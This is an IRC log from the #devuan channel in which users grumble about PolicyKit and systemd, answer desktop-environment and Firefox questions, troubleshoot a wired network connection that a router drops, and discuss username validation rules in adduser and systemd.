00:00.14 | DocScrutinizer05 | sounds like another freedosktop-gnome-poetterism |
00:01.11 | golinux | I think it started in wheezy |
00:01.27 | DocScrutinizer05 | facepalms |
00:01.42 | fsmithred | yeah, in wheezy, but I don't think it was a problem then |
00:01.56 | DocScrutinizer05 | no idea what it does, but obviously it's between nonsense and utter bullshit |
00:02.07 | golinux | It was for me in wheezy |
00:02.15 | DocScrutinizer05 | there's ***su for that |
00:02.17 | fsmithred | you know how the gksu window has a checkbox for how long you want the auth to last? |
00:02.27 | fsmithred | they took that away in pkexec |
00:02.35 | fsmithred | so you don't have to choose anymore |
00:02.40 | fsmithred | what a relief! |
00:02.48 | golinux | sarcasm noted |
00:02.48 | fsmithred | brb, need to check dinner |
00:04.13 | DocScrutinizer05 | either *-pkexec runs SUID (*ULTRABAD*) or it is actually a execve sudo (nonsense) |
00:09.59 | fsmithred | pkexec, like any other PolicyKit application, will use the authentication agent registered for the calling process. |
00:10.14 | DocScrutinizer05 | waaah policykit |
00:11.01 | DocScrutinizer05 | thanks for disclosing to me the meaning of pk though :-) |
00:11.15 | DocScrutinizer05 | I already wondered |
00:11.16 | fsmithred | yw |
00:11.47 | DocScrutinizer05 | isn't policykit a fallout/collateral of systemd crap? |
00:12.04 | fsmithred | maybe a precursor. It's been around for awhile. |
00:12.07 | DocScrutinizer05 | meanwhile maybe |
00:12.50 | DocScrutinizer05 | all that policy and session and seat management, it gives me nausea |
00:13.22 | fsmithred | seems way too complicated |
00:13.40 | *** join/#devuan s_kunk (~s_kunk@224.99.204.77.rev.sfr.net) |
00:13.40 | *** join/#devuan s_kunk (~s_kunk@unaffiliated/s-kunk/x-5139101) |
00:13.54 | DocScrutinizer05 | 95% complexity for the last 5% of (pointless) featuritis |
00:14.22 | DocScrutinizer05 | "narrator device in bootmenu" |
00:14.44 | DocScrutinizer05 | "do you hate blind people?" |
00:15.44 | DocScrutinizer05 | and my favorite: multiseat PC |
00:19.46 | *** join/#devuan infobot (~infobot@rikers.org) |
00:19.46 | *** topic/#devuan is Recent (2017-05-25): Jessie 1.0.0 stable release http://ur1.ca/qxaa5 || This is the Devuan https://devuan.org/ discussion channel (logged at https://botbot.me/freenode/devuan - with useful 'search') | Please take off-topic conversation to #debianfork | /msg chanserv info #devuan | !listkeys #devuan <foo> | Devuan Forum: https://dev1galaxy.org/ |
00:20.31 | fsmithred | and plug three monitors and keyboards into it? |
00:21.13 | *** join/#devuan guru (~guru@2601:196:8700:c91:3252:cbff:fec5:6f94) |
00:22.00 | DocScrutinizer05 | specing: I literally know nobody who does that nowadays or just thinks it might have advantages |
00:22.14 | DocScrutinizer05 | fsmithred: yes, exactly |
00:23.01 | DocScrutinizer05 | it doesn't scale, it has single point of failure, is terrible mess to administrate, and has no economic advantage either |
00:23.20 | DocScrutinizer05 | and wastes energy |
00:24.47 | specing | what |
00:24.49 | specing | no |
00:25.13 | DocScrutinizer05 | plus you're back to the mid 90s where we shouted through the office "IM BOOTING IN 2 MINUTES!!!" |
00:25.16 | specing | how does buying more weak PCs scale when you need max singlethread oooomph? |
00:25.38 | specing | the admin mess is due 99% to Xorg being a mess |
00:26.02 | specing | and I just said what the economic advantage is |
00:33.28 | DocScrutinizer05 | I can get almost three complete mini-PCs for the price of one gfx card that allows 3 displays, or a mainboard that allows 3 (cheaper) gfx cards |
00:34.44 | *** join/#devuan Oldmoss (~Oldmoss@217.23.3.92) |
00:35.36 | DocScrutinizer05 | when you need max oomph, you don't wnat to share that between 3 seats via sup-par displays |
00:36.26 | DocScrutinizer05 | slightly OT for #devuan since it won't get removed from devuan anyway, I guess |
00:38.34 | *** join/#devuan xzgv (~bobo@190.140.154.212) |
00:45.51 | *** join/#devuan xzgv (~bobo@190.140.154.212) |
00:57.00 | DocScrutinizer05 | re policykit, or (login|*)kit at large, the name suggests to me I get the pieces in a kit and can try to make something useful out of it myself |
01:03.05 | *** part/#devuan Oldmoss (~Oldmoss@217.23.3.92) |
01:34.37 | *** join/#devuan tarbz2 (~Thunderbi@186.23.155.100) |
01:36.41 | *** join/#devuan Oldmoss (~Oldmoss@137-137-11.connect.netcom.no) |
01:54.07 | *** join/#devuan Humpelstilzchen (erik@x4e3669ae.dyn.telefonica.de) |
01:59.26 | *** join/#devuan rdav (~rdav@61.181.148.122.sta.dodo.net.au) |
02:00.48 | *** join/#devuan Froboz (~bsmith@c-65-96-80-104.hsd1.ma.comcast.net) |
02:04.02 | Froboz | I've been poking at 1.0 for a week or so now. very nice work! |
02:04.49 | furrywolf | thanks! |
02:04.56 | furrywolf | (although I didn't do much of it) |
02:05.32 | Froboz | I didn't do ANY of it, unfortunately... on second thought, that's probably "fortunately", because it WORKS. :D |
02:06.19 | Froboz | (I harbor no illusions about my Mad Hacking Skillz. I'm a good Admin, but that's about it, I think. |
02:06.23 | Froboz | ) |
02:07.28 | *** join/#devuan haba_ (499cfa36@gateway/web/freenode/ip.73.156.250.54) |
02:08.05 | *** join/#devuan Hoshpak (~Hoshpak@p200300C90BC4770025F04C4283F4A397.dip0.t-ipconnect.de) |
02:09.11 | *** join/#devuan tallship_ (~tallship@47-144-201-112.lsan.ca.frontiernet.net) |
02:14.33 | *** join/#devuan justinsm (~justinsm@82-69-63-196.dsl.in-addr.zen.co.uk) |
02:25.41 | *** part/#devuan Oldmoss (~Oldmoss@137-137-11.connect.netcom.no) |
02:26.22 | *** join/#devuan debdog (~debdog@2a02:8070:418b:1400:7a24:afff:fe8a:d04d) |
02:47.44 | *** join/#devuan coagen (~coagen@unaffiliated/coagen) |
02:58.57 | *** join/#devuan coagen (~coagen@unaffiliated/coagen) |
03:06.13 | *** join/#devuan coagen (~coagen@unaffiliated/coagen) |
03:56.13 | *** join/#devuan minnesotags (~herbgarci@c-73-94-158-194.hsd1.mn.comcast.net) |
04:02.43 | *** join/#devuan rrq (~ralph@60-242-139-200.static.tpgi.com.au) |
05:20.27 | *** part/#devuan Froboz (~bsmith@c-65-96-80-104.hsd1.ma.comcast.net) |
06:08.35 | *** join/#devuan rdav (~rdav@61.181.148.122.sta.dodo.net.au) |
07:01.38 | *** join/#devuan mushmouth (~Patrick@bas1-peterborough62-74-12-146-200.dsl.bell.ca) |
07:05.24 | *** join/#devuan TwistedFate (~twistedfa@unaffiliated/twistedfate) |
07:07.31 | TwistedFate | Is it better to have a single sources.list than to have more of them separate? |
07:07.43 | TwistedFate | And if I install firefox, will it conflict with iceweasel? |
07:08.46 | Leander | it's just a matter of taste, I think |
07:09.03 | Leander | and there's no more iceweasel |
07:09.33 | Leander | it will install firefox-esr |
07:09.55 | Leander | which does not conflict with firefox from mozilla's repository, if that's what you're wondering |
07:10.04 | TwistedFate | hmm strange |
07:10.09 | TwistedFate | i still have option to run iceweasel |
07:10.15 | TwistedFate | even tho it shows like its firefox O.o |
07:11.16 | Leander | it's probably just a symlink or a small script calling firefox |
07:12.18 | TwistedFate | ah |
07:12.35 | TwistedFate | now i see why they opted for esr version, in main firefox there is no sound for alsa users |
07:14.55 | TwistedFate | i could never have imagined that mozilla will take a route of a software tyrant |
07:15.15 | Leander | I think that iceweasel was based on firefox ESR for a few years already |
07:15.52 | TwistedFate | also apt-get remove && apt-get purge firefox didnt get rid of my installed plugins and profile.. |
07:16.26 | Leander | I don't think purge will ever touch config files in your home folder |
07:17.14 | Leander | I'd expect it to only remove global config files |
07:17.42 | TwistedFate | i dont know where it keeps its config O.o |
07:18.11 | Leander | probably in .mozilla |
07:18.33 | TwistedFate | sigh.. i looked 2 times in home for a hidden folders |
07:18.39 | TwistedFate | and i didnt see it, now i do :S |
07:26.05 | *** join/#devuan Jjp137 (~Jjp137@cpe-75-83-16-81.socal.res.rr.com) |
07:30.37 | *** join/#devuan mipl (~mipl@c-52d2d954.013-181-67626729.cust.bredbandsbolaget.se) |
07:30.40 | *** join/#devuan mchasard (~devuan@48.233.8.109.rev.sfr.net) |
07:52.13 | *** join/#devuan aitor (~aitor@171.85-84-183.dynamic.clientes.euskaltel.es) |
07:52.20 | aitor | good morning |
07:52.49 | aitor | yes, in the hidden .mozilla file |
07:52.55 | aitor | folder* |
08:16.45 | *** join/#devuan Irrwahn (UNKNOWN@p57992B34.dip0.t-ipconnect.de) |
08:24.23 | *** join/#devuan thaller (~thaller@ip-78-45-133-27.net.upcbroadband.cz) |
08:39.57 | *** join/#devuan Pali (~pali@Maemo/community/contributor/Pali) |
08:41.29 | *** join/#devuan yuki_is_bored (~yuki_is_b@202.80.219.8) |
08:51.23 | *** join/#devuan Levure (~quassel@211.110-242-81.adsl-dyn.isp.belgacom.be) |
09:15.34 | *** join/#devuan Besnik_b (~Besnik@ppp-94-66-221-111.home.otenet.gr) |
09:29.47 | metax | so, let's talk about privacy |
09:39.09 | TheTrueHooha | metax: https://vid.me/ogUF6~ |
09:39.19 | TheTrueHooha | metax: https://vid.me/ogUF6 |
09:58.15 | *** join/#devuan rdav (~rdav@61.181.148.122.sta.dodo.net.au) |
10:10.28 | metax | " Hmm... this page doesn't seem to exist. " |
10:10.38 | TheTrueHooha | wut |
10:10.47 | TheTrueHooha | Second link, metax |
10:10.58 | TheTrueHooha | Doesn't work with the ~ I accidently added |
10:12.30 | metax | https://transfer.sh/tc9hd/Screenshot%20from%202017-07-09%2013-11-03.png |
10:13.32 | TheTrueHooha | du fug |
10:13.46 | TheTrueHooha | https://vid.me/ogUF |
10:13.49 | TheTrueHooha | Oh |
10:13.52 | TheTrueHooha | Fuggin 6 |
10:20.50 | *** join/#devuan peetaur (~peter@p57AAA71E.dip0.t-ipconnect.de) |
10:47.13 | *** join/#devuan bn_ (~bn_@c-65-50-70-13.hs.gigamonster.net) |
11:32.41 | TwistedFate | Which DE's are installable and work properly in Devuan? |
11:33.07 | *** join/#devuan bazquxer (~bazquxer@gateway/tor-sasl/bazquxer) |
11:33.27 | fsmithred | xfce, lxde, mate (mostly), and kde can be added after install. |
11:34.02 | fsmithred | if you want to go third-party, trinity (kde3 fork) also works |
11:34.17 | TwistedFate | fsmithred: so i should not have any issues with kde regarding systemd crap? |
11:34.21 | fsmithred | and in ascii, cinnamon will work with some minor edits to configs. |
11:34.33 | fsmithred | I don't think so |
11:34.40 | fsmithred | haven't tried it myself |
11:36.37 | fsmithred | aptitude -s install kde-plasma-desktop tells me that it would install on my system, and I'm not even allowing libsystemd0 here. |
11:39.33 | fsmithred | attempting to install task-kde-desktop gives me errors |
11:39.59 | fsmithred | libpulsedsp : Depends: libpulse0 (= 10.0-1) but 10.0-2 is installed |
11:39.59 | fsmithred | <PROTECTED> |
11:42.03 | fsmithred | oops. Cancel all those results - I forgot that the terminal I'm using is logged into another machine that's running ascii. |
11:48.27 | TwistedFate | fsmithred: im on ceres |
11:48.36 | fsmithred | ok |
11:48.49 | *** join/#devuan kelsoo2 (~kelsoo@dragora/developer/kelsoo) |
11:49.01 | fsmithred | good, 'cause in jessie, I'm running into problems with vlc-data |
11:49.08 | TwistedFate | hmm, there doesnt seem to be trinity in the repos |
11:49.16 | TwistedFate | oh, you said third party |
11:49.29 | fsmithred | apt wants to install a newer version from jessie-security, but a lot of the kde stuff isn't happy with that |
11:49.31 | fsmithred | yeah |
11:50.14 | fsmithred | kde will install in ascii, so it should also install in ceres. Word on the street is "don't lock the screen" |
11:52.24 | *** join/#devuan pav5088_ (~pav5088@101.165.10.120) |
11:52.45 | fsmithred | TwistedFate: https://wiki.trinitydesktop.org/Devuan_Trinity_Repository_Installation_Instructions |
11:54.06 | fsmithred | or if you just want to test-drive trinity on devuan: http://exegnulinux.net/ |
11:55.35 | *** join/#devuan cyteen (~cyteen@47.143.199.146.dyn.plus.net) |
11:55.58 | TwistedFate | huh, interesting |
11:56.08 | TwistedFate | thanks, nice of them to give us trinity :) |
11:58.25 | *** join/#devuan thomascovenant (~qt_junkie@fsfe/thomascovenant) |
12:06.06 | *** join/#devuan justinsm (~justinsm@82-69-63-196.dsl.in-addr.zen.co.uk) |
12:24.12 | *** join/#devuan Oldmoss (~Oldmoss@217.23.3.96) |
12:31.20 | specing | Is there any recent/good MTA tutorial for devuan? (Also I hate mysql and PHP, but the later is unavoidable) |
12:31.29 | *** join/#devuan kelsoo (~kelsoo@dragora/developer/kelsoo) |
12:34.50 | *** join/#devuan kelsoo1 (~kelsoo@dragora/developer/kelsoo) |
12:35.15 | *** join/#devuan TwistedFate (~twistedfa@unaffiliated/twistedfate) |
12:45.49 | *** join/#devuan giricz81 (~giricz81@ip4-83-240-38-90.cust.nbox.cz) |
12:52.41 | *** join/#devuan Pali (~pali@Maemo/community/contributor/Pali) |
13:01.59 | *** join/#devuan enyc (~enyc@muddle.enyc.org.uk) |
13:02.19 | *** join/#devuan Fervi (~fervi@89-76-224-228.dynamic.chello.pl) |
13:02.40 | Fervi | need sysvinit for OpenVZ ... I can't work on this f****** systemd |
13:03.00 | enyc | Fervi: well use it? whats the problem? |
13:03.23 | Fervi | Sysvinit etc doesn't work. |
13:03.23 | Fervi | And with new upgrade, mariadb stop works, because fuck it |
13:03.55 | enyc | Fervi: hum.......... "sysvinit etc doesnt work" <-- confused |
13:04.22 | Fervi | Only systemd works on OpenVZ (or maybe hacks needed, but don't know why) |
13:04.42 | Fervi | If I install sysvinit, then system don't boot. It waits for something like "give me a runlevel" |
13:04.58 | Fervi | and you can type something, but only S works (then ask for superuser password) |
13:05.17 | Fervi | Systemd give me this on mariadb |
13:05.18 | Fervi | lip 09 15:03:58 pingwinek systemd[438]: mariadb.service: Failed at step KEYRING spawning /usr/bin/install: Permission denied |
13:05.18 | Fervi | What dafuq it mean, dunno |
13:05.29 | Fervi | Why systemd can't use install - i don't know |
13:05.36 | Fervi | i even give 777 chmod for /usr/bin/install |
13:07.44 | Fervi | I'm trying to start mysql without systemd |
13:09.01 | Fervi | OpenVZ is container ofc |
13:09.02 | Fervi | for VPS |
13:11.09 | Fervi | ok. My site works, but please do something to run normal inits on OpenVZ |
13:17.00 | *** part/#devuan Oldmoss (~Oldmoss@217.23.3.96) |
13:19.04 | *** join/#devuan phogg (~phogg@pdpc/supporter/student/phogg) |
13:19.17 | *** join/#devuan aitor (~aitor@171.85-84-183.dynamic.clientes.euskaltel.es) |
13:19.30 | aitor | parazyd: are you there? |
13:20.19 | parazyd | yeah? |
13:21.23 | aitor | linux-heads has built succesfully :) |
13:21.29 | aitor | uploading it: |
13:21.31 | aitor | http://gnuinos.org/linux-heads-4.9.33/ |
13:21.44 | parazyd | ok |
13:21.51 | aitor | the issue is in the config file |
13:22.21 | aitor | shortly i'll build the installers |
13:25.47 | aitor | i added the grsecurity and the PaX variables to the config file, but it might need a review |
13:27.14 | aitor | pianno pianno |
14:00.09 | *** join/#devuan justinsm (~justinsm@82-69-63-196.dsl.in-addr.zen.co.uk) |
14:09.47 | *** join/#devuan Pali (~pali@Maemo/community/contributor/Pali) |
14:21.54 | *** join/#devuan Kruppt (~Kruppt@104.169.44.99) |
14:23.33 | *** join/#devuan banshi (~banshi@85.115.248.134) |
14:27.38 | *** join/#devuan AntoFox (~Thunderbi@dynamic-adsl-78-12-41-30.clienti.tiscali.it) |
14:33.38 | *** join/#devuan Evilham (~Evilham@89.38.96.189) |
14:35.04 | *** join/#devuan peetaur (~peter@p200300E10BDE9700922B34FFFE307A16.dip0.t-ipconnect.de) |
14:37.01 | *** join/#devuan gmcmob (4da8c28f@gateway/web/freenode/ip.77.168.194.143) |
14:45.07 | *** join/#devuan Everche (~zaiwurong@61.48.197.4) |
14:50.17 | *** join/#devuan harald (~harald@77.51-175-130.customer.lyse.net) |
14:50.24 | harald | quit |
14:50.26 | harald | exit |
14:50.28 | harald | bye |
14:50.32 | harald | q |
14:50.38 | harald | exit |
14:51.38 | debdog | *thumbsup* |
15:06.17 | buZz | lol |
15:17.12 | *** join/#devuan Obi_Code_konobi (~Obi_Code_@c110-21-187-221.blktn5.nsw.optusnet.com.au) |
15:22.01 | *** join/#devuan gmc (~gmc@freenode/sponsor/gmc) |
15:24.26 | *** join/#devuan Capricornus (~HexChat@46.165.242.166) |
15:25.37 | *** join/#devuan DPA (~Daniel@194.230.159.132) |
15:26.00 | *** join/#devuan Akuli (~Akuli@2001:999:42:75d5:21e:65ff:fe37:6b62) |
15:33.28 | *** join/#devuan seagoon (ae8dcbe6@gateway/web/freenode/ip.174.141.203.230) |
15:35.35 | *** join/#devuan g0zzy (~goose@host86-143-28-86.range86-143.btcentralplus.com) |
15:47.48 | *** join/#devuan menip (~menip@73.53.122.132) |
15:50.17 | *** join/#devuan metax (~metax@gateway/tor-sasl/metax) |
15:52.44 | *** join/#devuan atrapado_ (~atrapado@unaffiliated/atrapado) |
15:53.13 | *** join/#devuan furrywolf (~randyg@172.56.38.143) |
15:56.09 | *** join/#devuan catprints (~realperso@172.58.83.137) |
15:58.28 | furrywolf | spots catprints, then looks around for the cat that left them |
16:03.05 | catprints | cat lurking |
16:03.22 | fsmithred | I keep reading it as Cat Prince |
16:03.39 | Obi_Code_konobi | Obi_Code_konobi, readies the light saber |
16:04.30 | Obi_Code_konobi | Obi_Code_konobi, strikes towards catprints and decapitates him |
16:04.39 | Obi_Code_konobi | job done |
16:04.47 | furrywolf | finds and pets the cat |
16:05.29 | Obi_Code_konobi | lol |
16:05.51 | catprints | liking Cat Prince |
16:07.09 | fsmithred | better check to see what your cats think before any name changes |
16:07.36 | catprints | my nick tells what they think. |
16:07.47 | fsmithred | did I mention how much I hate uefi? |
16:08.32 | catprints | sounds familiar. |
16:10.01 | furrywolf | yes, I believe you have. :) |
16:21.17 | *** join/#devuan Jjp137 (~Jjp137@cpe-75-83-16-81.socal.res.rr.com) |
16:51.52 | *** join/#devuan Guest46404 (~bobo@190.140.154.212) |
16:51.59 | *** join/#devuan gmcastil (~user@97-122-237-94.hlrn.qwest.net) |
16:52.37 | gmcastil | i have a weird problem with my network randomly kicking one of my machines off - under windows, i just have to restart the network and it fixes it. But on linux i have to eboot, because i cant figure out how to restart the network service |
16:52.58 | fsmithred | service networking restart |
16:53.48 | gmcastil | yeah, ive done that and it doesnt look like anything happens |
16:54.14 | gmcastil | it gives me a warning and says that running restart is depracated and may not reenable some interfaces |
16:54.17 | fsmithred | is wicd installed? you can reconnect with that |
16:54.35 | fsmithred | yeah, it's been saying that since squeeze or lenny. |
16:54.55 | fsmithred | did you edit /etc/network/interfaces? |
16:55.28 | gmcastil | i did at one point - not sure what should be in there now |
16:55.36 | gmcastil | is that something i shouldnt edit? |
16:55.47 | fsmithred | well, how are you connecting to the network? |
16:55.59 | gmcastil | wired, dhcp |
16:56.34 | fsmithred | what causes it to connect? |
16:56.56 | fsmithred | network-manager, wicd, connman, ceni, dhclient? |
16:57.09 | fsmithred | simple-netaid, setnet.sh |
16:57.12 | gmcastil | at startup its dhclient i believe - or whatever devuan does out of hte box |
16:57.26 | fsmithred | did you do the default xfce desktop install? |
16:57.30 | gmcastil | yes |
16:57.39 | gmcastil | wicd is installed and the daemon is running |
16:57.40 | fsmithred | go into the apps menu, under network |
16:57.41 | fsmithred | ok |
16:57.47 | fsmithred | open wicd |
16:57.57 | fsmithred | make sure it shows the wired interface |
16:58.11 | fsmithred | click on the connect button |
16:59.25 | gmcastil | its trying to obtain an IP address now.... is it just running dhclient underneath? |
16:59.34 | furrywolf | something here doesn't make sense. what is "restart the network"? wired networks don't have a connected state, and all the default wireless ones automatically reconnect. |
16:59.41 | fsmithred | not sure |
17:00.08 | gmcastil | so wicd didnt work - it just says not connected |
17:00.19 | gmcastil | fwiw, i have no wireless connections |
17:00.27 | fsmithred | yeah, that shouldn't matter |
17:00.41 | gmcastil | and i've eliminated hardware issues by replacing the router, cable, and multiple ethernet cards |
17:01.09 | fsmithred | look in /etc/network/interfaces to see if there's an entry for eth0 |
17:01.25 | gmcastil | yeah, it just says auto eth1 |
17:02.26 | fsmithred | that's all? |
17:02.34 | fsmithred | not a line with dhcp or static? |
17:02.37 | gmcastil | no |
17:02.38 | fsmithred | and is eth1 correct? |
17:02.47 | gmcastil | yeah, thts the device i'm connected to |
17:03.02 | gmcastil | i had thought there should have beenan entry about dhclient |
17:03.07 | fsmithred | if it's just that line, you should remove or comment it out |
17:03.33 | gmcastil | just get rid of it and leave the lo and inet loopback lines? |
17:03.42 | fsmithred | go back to wicd, open the preferences (triangle/arrow upper-right) |
17:03.54 | fsmithred | make sure eth1 is set as the default wired device |
17:04.26 | gmcastil | it is |
17:04.35 | *** join/#devuan Everche (~zaiwurong@61.48.197.4) |
17:04.47 | fsmithred | root terminal: dhclient eth1 |
17:05.11 | gmcastil | and remove the line from the interfaces file? |
17:05.14 | fsmithred | yes, leave the lo stanza |
17:05.30 | fsmithred | if eth1 only has that one line, it's not right. |
17:05.44 | gmcastil | removed it and running dhclient |
17:06.04 | fsmithred | so you went from three lines to two in the interfaces file, right? |
17:06.10 | fsmithred | not four lines to three? |
17:06.19 | gmcastil | no, 3 lines to 2 |
17:06.23 | fsmithred | ok |
17:06.40 | gmcastil | auto lo \ iface lo inet loopback |
17:06.47 | fsmithred | yeah |
17:06.57 | fsmithred | dhclient work? |
17:07.00 | gmcastil | and then the error that dhclient gives is 'No DHCPOFFER received. No working leases in persistent database - sleeping." |
17:07.17 | gmcastil | ive googled that error a number of times and got nothing that seemed to help |
17:07.33 | fsmithred | wire plugged in tight? |
17:07.45 | gmcastil | yes, yes, i've eliminated all of the usual hardware problems |
17:07.57 | *** join/#devuan Xenguy_ (~Xenguy@unaffiliated/xenguy) |
17:07.59 | gmcastil | also...resetting the router doesnt work. And i've wiresharked the machine and all i see coming out of it are ARP requests for who has 192.168.0.1 |
17:08.20 | fsmithred | ifconfig |
17:08.49 | fsmithred | really eth1 and not eth0? |
17:09.04 | fsmithred | you have two nics or you moved the hard drive from another machine? |
17:09.09 | gmcastil | eyah, i have another device in my machine |
17:09.22 | gmcastil | a network card and a motherboard based ethernet device |
17:09.44 | gmcastil | ifconfig shows eth1 and lo....ifconfig -a shows eth0, eth1, and lo |
17:09.55 | gmcastil | and we're plugged into eth1 |
17:10.00 | fsmithred | ok |
17:10.36 | *** join/#devuan justinsm (~justinsm@82-69-63-196.dsl.in-addr.zen.co.uk) |
17:11.18 | fsmithred | cat /etc/resolv.conf |
17:11.24 | gmcastil | i'm not convinced that the networking restart is actually doing anything |
17:11.28 | fsmithred | make sure it's not pointing to the wrong nameserver |
17:11.38 | gmcastil | nameserver 192.168.0.1 |
17:11.44 | fsmithred | probably not, since there's nothing in interfaces |
17:11.45 | gmcastil | and nameserver 205.171.3.something else |
17:11.49 | fsmithred | ok |
17:11.53 | fsmithred | dlink router? |
17:11.55 | gmcastil | the thing is that it works |
17:12.14 | gmcastil | no, its a craptacular router from centurylink - replaed it a couple weeks ago and same problem |
17:12.43 | gmcastil | i've been working the source of the problem and have concluded it is a bug in the firmware of the router that randomly decides to drop some connections and then ignore the machine |
17:12.49 | gmcastil | the router thinks its still attached to this box |
17:12.52 | gmcastil | even though its not |
17:13.06 | gmcastil | probably because the physical link is still being maintained |
17:13.10 | fsmithred | reboot router fixes it? |
17:13.13 | gmcastil | no |
17:13.18 | gmcastil | rebooting the machine fixes it (for linux) |
17:13.28 | gmcastil | on windows, just going to "Troubleshoot my network interface." does it |
17:13.39 | gmcastil | so windows is doing something to the network interface that isnt being done on linux |
17:13.56 | *** join/#devuan guru (~guru@c-66-31-121-178.hsd1.ma.comcast.net) |
17:13.58 | fsmithred | ifconfig eth1 down |
17:14.01 | gmcastil | i want to know determine what that is, so that i can duplicate it under linux and not have to reboot everytime |
17:14.04 | fsmithred | then try dhclient again |
17:15.28 | gmcastil | same error again - no working leases in persisten database |
17:16.10 | gmcastil | another datapoint....same problem on multiple distros, even those that use network-manager |
17:16.15 | fsmithred | other thing I can think of trying is to configure it in interfaces file and get rid of wicd |
17:16.48 | fsmithred | router doesn't like your network card? |
17:16.53 | gmcastil | multiple NCI |
17:16.56 | gmcastil | NIC* |
17:17.10 | fsmithred | have you tried the onboard nic? |
17:17.11 | gmcastil | im logged into the router now and it shows a 1G connection to this machine |
17:17.20 | gmcastil | yes, this problem is independent of network interface |
17:18.50 | fsmithred | brb need coffee |
17:18.53 | gmcastil | uh....so, this is weird...i unplugged the network cable and switched to the other NIC |
17:18.59 | gmcastil | and then dhclient eth0 brought it up |
17:19.12 | fsmithred | lol, yeah, weird. |
17:19.25 | gmcastil | you've no idea...i've spent the better part of a year trying to debug this problem |
17:19.50 | gmcastil | it does it to every wired machine on my network |
17:20.03 | fsmithred | next time get a better router |
17:20.15 | gmcastil | i dont know if i can |
17:20.24 | gmcastil | its one of those router / modem combos from my ISP |
17:20.35 | fsmithred | have you got a real router around? |
17:20.52 | fsmithred | you can probably set the combo to bridged mode and use your own router |
17:20.58 | *** join/#devuan Oldmoss (~Oldmoss@anon-46-32.vpn.ipredator.se) |
17:21.21 | *** join/#devuan Akuli (~Akuli@2001:999:42:75d5:21e:65ff:fe37:6b62) |
17:21.22 | fsmithred | I did that with a couple different verizon modem/routers |
17:21.22 | gmcastil | i dont - but there is no reason to believe it wouldnt drop the wired router connection on a regular basis |
17:22.35 | fsmithred | you'd be asking it to do less work |
17:22.44 | *** join/#devuan tarbz2 (~Thunderbi@186.23.155.100) |
17:22.53 | fsmithred | not doing routing |
17:23.18 | fsmithred | maybe you know someone who has a spare you could use for testing |
17:23.52 | gmcastil | oh, you mean disabling the routing portion of the router and just using my own? |
17:24.14 | fsmithred | yes |
17:24.31 | gmcastil | thats not a bad idea - another engineer at work concluded the same as i did that it was likely a bug in the firmware - when centurylink replaced my modem, i thought i'd have it solved, but then saw that the firmware revisions were the same |
17:24.33 | fsmithred | is it an actiontek from verizon? |
17:25.10 | gmcastil | no, its one of these Zyxel routers |
17:25.15 | fsmithred | don't know it |
17:25.31 | fsmithred | if it's not obvious how to set it to bridged mode, call tech support and ask them |
17:25.38 | fsmithred | they should be able to walk you through it |
17:26.05 | fsmithred | give you some secret url to get into the right page of the admin interface |
17:26.15 | gmcastil | i can figure it out - hadnt thought of offloading routing to a different router |
17:27.11 | fsmithred | extra bonus if your router will take free firmware |
17:27.54 | fsmithred | brb |
17:28.18 | gmcastil | yeah...thanks for the suggestion btw |
17:28.44 | gmcastil | i'll give that a try - but switching eth devices and then running dhclient was a good idea, which i hadnt really tried before (that i can think of) |
17:29.11 | gmcastil | its a livable workaround - rebooting to reset the physical interface has been killing my productivity |
17:40.08 | *** join/#devuan Xenguy_ (~Xenguy@unaffiliated/xenguy) |
17:58.54 | *** part/#devuan Oldmoss (~Oldmoss@anon-46-32.vpn.ipredator.se) |
18:04.01 | *** join/#devuan aitor (~aitor@36.red-81-32-10.dynamicip.rima-tde.net) |
18:04.08 | aitor | hi |
18:19.12 | *** join/#devuan Achylles (~Achylles@191.8.23.75) |
18:38.24 | *** join/#devuan twz_ (~twz@2601:4a:4201:e95c:9012:f42e:f8f0:a50c) |
18:39.02 | *** join/#devuan twz (~twz@2601:4a:4201:e95c:9012:f42e:f8f0:a50c) |
18:49.04 | *** join/#devuan matlock (~matlock@24.96.131.20) |
18:53.10 | DocScrutinizer05 | how's adduser supposed to be configured in Devuan regarding acceptable usernames? man adduser|less -j3 +"/the configurable regular expression" . Is there other stuff that sets (other) policies? What's "common knowledge" about DOs and DONTs regarding usernames when e.g. editing etc/passwd "manually", or when using YP whatever? |
18:53.56 | *** join/#devuan g0zzy (~goose@host86-143-28-86.range86-143.btcentralplus.com) |
18:58.55 | DPA | There is a file /etc/adduser.conf |
19:12.56 | DocScrutinizer05 | yes, I know. I guess what I actually wanted to ask for is in man useradd|less -j6 +'/On Debian, the only constraints are.*$' |
19:14.22 | DocScrutinizer05 | and how such policy gets enforced (or does or doesn't apply to) "external user database such as NIS or LDAP! |
19:22.37 | DPA | I don't think it's possible to completely prevent the existence of a user with a bad name. However, it may be possible to prevent the ussage of such a user to some extent using pam. |
19:27.34 | KatolaZ | DPA: I don't understand what a "bad name" is |
19:27.55 | KatolaZ | POSIX allows username to be any combination of alphanumeric characters |
19:28.06 | KatolaZ | as long as the first character is not a dash |
19:29.23 | KatolaZ | but it is specified that you can actually have also usernames starting with a dash |
19:29.31 | KatolaZ | but those are not to be considered "portable" |
19:30.15 | DocScrutinizer05 | sorry for bringing it up here, but for background: (planned) >>DEBIAN BUG: debian systemd 'user=' denies service to usernames that are perfectly valid according to `man useradd|less -j6 +'/On Debian, the only constraints are.*$' ` -- the 'syntax' check on name values for key "user=" should get removed completely since it doesn't serve any obvious purpose<< -- related: https://github.com/systemd/systemd/issues/6309#issuecomment- |
19:30.17 | DocScrutinizer05 | 313911276 |
19:30.50 | DPA | KatolaZ: A bad username is whatever a sysadmin decides doesn't match his own user name policy |
19:31.57 | DocScrutinizer05 | DPA: exactly, emphasis on "sysadmin decides" |
19:31.58 | gnarface | my prediction soon: systemd compromised by automated remote user adds with shell escapes in the names |
19:35.51 | KatolaZ | DPA: agreed :) |
19:36.02 | KatolaZ | but it's the sysadmin who creates usernames, right? |
19:36.15 | DocScrutinizer05 | yes, *should* |
19:37.11 | *** join/#devuan aitor (~aitor@36.red-81-32-10.dynamicip.rima-tde.net) |
19:37.20 | DocScrutinizer05 | unless NIS/YP etc, where not you but another sysadmin did that |
19:38.59 | DPA | right |
19:40.22 | DocScrutinizer05 | getpwnam_r() anyway doesn't know any restrictions afaik |
19:41.13 | DocScrutinizer05 | so no need to over-sanitize any name parameter provided to that function, right? |
19:42.30 | *** join/#devuan Evilham (~Evilham@89.38.96.189) |
19:43.05 | DocScrutinizer05 | basically absolutely same rationale applies to e.g `su` and `sudo` |
19:43.11 | *** join/#devuan cocoadaemon (~foo@2a01:e35:8a99:e90:1202:b5ff:fe91:e4ca) |
19:44.29 | DocScrutinizer05 | I never heard su would reject "syntactically incorrect" usernames, just because it can |
